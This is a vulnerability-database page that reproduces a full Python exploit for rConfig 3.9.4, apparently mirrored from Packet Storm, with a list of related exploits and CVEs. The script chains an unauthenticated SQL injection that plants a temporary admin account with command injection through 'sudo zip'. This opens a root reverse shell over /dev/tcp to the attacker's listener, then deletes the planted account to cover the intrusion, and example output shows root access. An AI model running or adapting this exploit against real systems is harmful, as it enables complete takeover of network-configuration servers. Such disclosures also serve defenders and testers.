Lucene search
K

rConfig 3.9.4 searchField Remote Code Execution

🗓️ 28 Mar 2020 00:00:00Reported by vikingfrType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 1121 Views

rConfig 3.9.4 Unauthenticated Code Executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
rConfig 3.9.3 - Authenticated Remote Code Execution Exploit
30 Jan 202000:00
zdt
0day.today
rConfig 3.9 - (searchColumn) SQL Injection Exploit
12 Mar 202000:00
zdt
0day.today
Rconfig 3.x Chained Remote Code Execution Exploit
17 Mar 202000:00
zdt
0day.today
rConfig 3.9.4 - (searchField) Unauthenticated Root Remote Code Execution Exploit
28 Mar 202000:00
zdt
GithubExploit
Exploit for OS Command Injection in Rconfig
2 Dec 201916:32
githubexploit
ATTACKERKB
CVE-2020-10547
4 Jun 202000:00
attackerkb
ATTACKERKB
CVE-2019-19585
8 Aug 201900:00
attackerkb
ATTACKERKB
CVE-2020-10548
4 Jun 202000:00
attackerkb
ATTACKERKB
CVE-2020-10549
4 Jun 202000:00
attackerkb
ATTACKERKB
CVE-2020-10546
4 Jun 202000:00
attackerkb
Rows per page
`# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution  
# Exploit Author: vikingfr  
# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)  
# Date: 2020-03-12  
# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220  
# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py  
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)  
# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip  
# Install scripts :  
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh  
# https://www.rconfig.com/downloads/scripts/centos7_install.sh  
# https://www.rconfig.com/downloads/scripts/centos6_install.sh  
# Version: tested v3.9.4  
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24  
#  
# Notes : If you want to reproduce in your lab environment follow those links :  
# http://help.rconfig.com/gettingstarted/installation  
# then  
# http://help.rconfig.com/gettingstarted/postinstall  
#  
# Example :  
# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334  
# rConfig - 3.9 - Unauthenticated root RCE  
# [+] Adding a temporary admin user...  
# [+] Authenticating as dywzxuvbah...  
# [+] Logged in successfully, triggering the payload...  
# [+] Check your listener !  
# [+] The reverse shell seems to be opened :-)  
# [+] Removing the temporary admin user...  
# [+] Done.  
#  
# $ nc -nvlp 3334  
# listening on [any] 3334 ...  
# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186  
# sh: no job control in this shell  
# sh-4.2# id  
# id  
# uid=0(root) gid=0(root) groups=0(root)  
# sh-4.2#   
  
#!/usr/bin/python3  
import requests  
import sys  
import urllib.parse  
import string  
import random  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
from requests.exceptions import Timeout  
  
print ("rConfig - 3.9 - Unauthenticated root RCE")  
  
if len(sys.argv) != 4:  
print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort")  
exit()  
  
target = sys.argv[1]  
ip = sys.argv[2]  
port = sys.argv[3]  
  
vuln_page="/commands.inc.php"  
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"  
def generateUsername(stringLength=8):  
u= string.ascii_lowercase  
return ''.join(random.sample(u,stringLength))  
  
print ("[+] Adding a temporary admin user...")  
fake_id = str(random.randint(200,900))  
fake_user = generateUsername(10)  
fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'  
fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"  
userleveladmin = 9 # Administrator  
addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--"  
encoded_request = target+vuln_page+vuln_parameters+addUserPayload  
firstrequest = requests.session()  
exploit_req = firstrequest.get(encoded_request,verify=False)  
  
request = requests.session()  
login_info = {  
"user": fake_user,  
"pass": "admin",  
"sublogin": 1  
}  
print ("[+] Authenticating as "+fake_user+"...")  
login_request = request.post(  
target+"/lib/crud/userprocess.php",  
login_info,  
verify=False,  
allow_redirects=True  
)  
  
dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)  
  
payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)  
if dashboard_request.status_code == 200:  
print ("[+] Logged in successfully, triggering the payload...")  
encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))  
print ("[+] Check your listener !")  
try:  
exploit_req = request.get(encoded_request,timeout=10)   
except Timeout:  
print('[+] The reverse shell seems to be opened :-)')  
else:  
print('[-] The command was not executed by the target or you forgot to open a listener...')  
  
elif dashboard_request.status_code == 302:  
print ("[-] Wrong credentials !? Maybe admin were not added...")  
exit()  
  
print("[+] Removing the temporary admin user...")  
delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--"  
encoded_request = target+vuln_page+vuln_parameters+delUserPayload  
lastrequest = requests.session()  
exploit_req = lastrequest.get(encoded_request,verify=False)  
print ("[+] Done.")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Mar 2020 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.99683
1121